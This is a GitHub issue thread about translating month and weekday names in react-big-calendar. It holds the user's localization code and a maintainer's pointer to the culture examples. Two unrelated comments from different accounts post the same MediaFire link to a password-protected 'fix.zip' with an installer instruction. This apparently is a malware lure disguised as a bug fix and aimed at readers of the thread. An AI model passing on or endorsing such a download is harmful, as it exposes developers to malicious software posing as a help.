### ISSUE TITLE
How to change the language of the month and weekday labels?

### ISSUE THREAD

**Issue by chsalamin** [jquense/react-big-calendar#2644]
### Check that this is really a bug

- [X] I confirm

### Reproduction link

https://paroisse.saint-augustin.ch/reservations/

### Bug description

As I've been able to display labels in french – allDay, week, month, day, previous, next... –  I would have hoped that the names of the months would also be translated into french..

My code:
import {Calendar, momentLocalizer} from 'react-big-calendar'
import moment from 'moment/dist/moment'
import 'moment/locale/fr'
import 'moment/locale/de'

...
const localizer = momentLocalizer(moment)
const lang = {
    fr: {
        allDay: "Tous les jours",
        week: 'Semaine',
        work_week: 'Semaine de travail',
        day: 'Jour',
        month: 'Mois',
        previous: '<',
        next: '>',
        today: `Aujourd'hui`,
        agenda: 'Planning',
        showMore: (total) => `+${total} plus`,
    },
    de: {
        allDay: "Alle Tage",
        week: 'Woche',
        work_week: 'Arbeitswoche',
        day: 'Tag',
        month: 'Monat',
        previous: '<',
        next: '>',
        today: `Heute`,
        agenda: 'Planning',
        showMore: (total) => `+${total} mehr`,
    }
}
const {messages} = useMemo(
        () => ({
            messages: lang[culture],
        }),
        [culture]
    );
...

<Calendar
       localizer={localizer}
       messages={messages}
       culture={culture}
/>

### Expected Behavior

All labels in french

### Actual Behavior

Most labels in french, months and days names still in english.

### react-big-calendar version

1.13.3

### React version

18.3.1

### Platform/Target and Browser Versions

macOS Chrome 127.0.6533.100

### Validations

- [X] Read the [docs](http://jquense.github.io/react-big-calendar/examples).
- [X] Check that there isn't already an issue that request the same feature to avoid creating a duplicate.
- [X] Make sure this is a react-big-calendar issue and not an implementation issue

### Would you like to open a PR for this bug?

- [ ] I'm willing to open a PR

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cutterbl** [comment]
See our [culture](https://jquense.github.io/react-big-calendar/examples/index.html?path=/docs/props--culture) example as well as our [Localization Example](https://jquense.github.io/react-big-calendar/examples/index.html?path=/docs/examples--example-5) for how you address this.
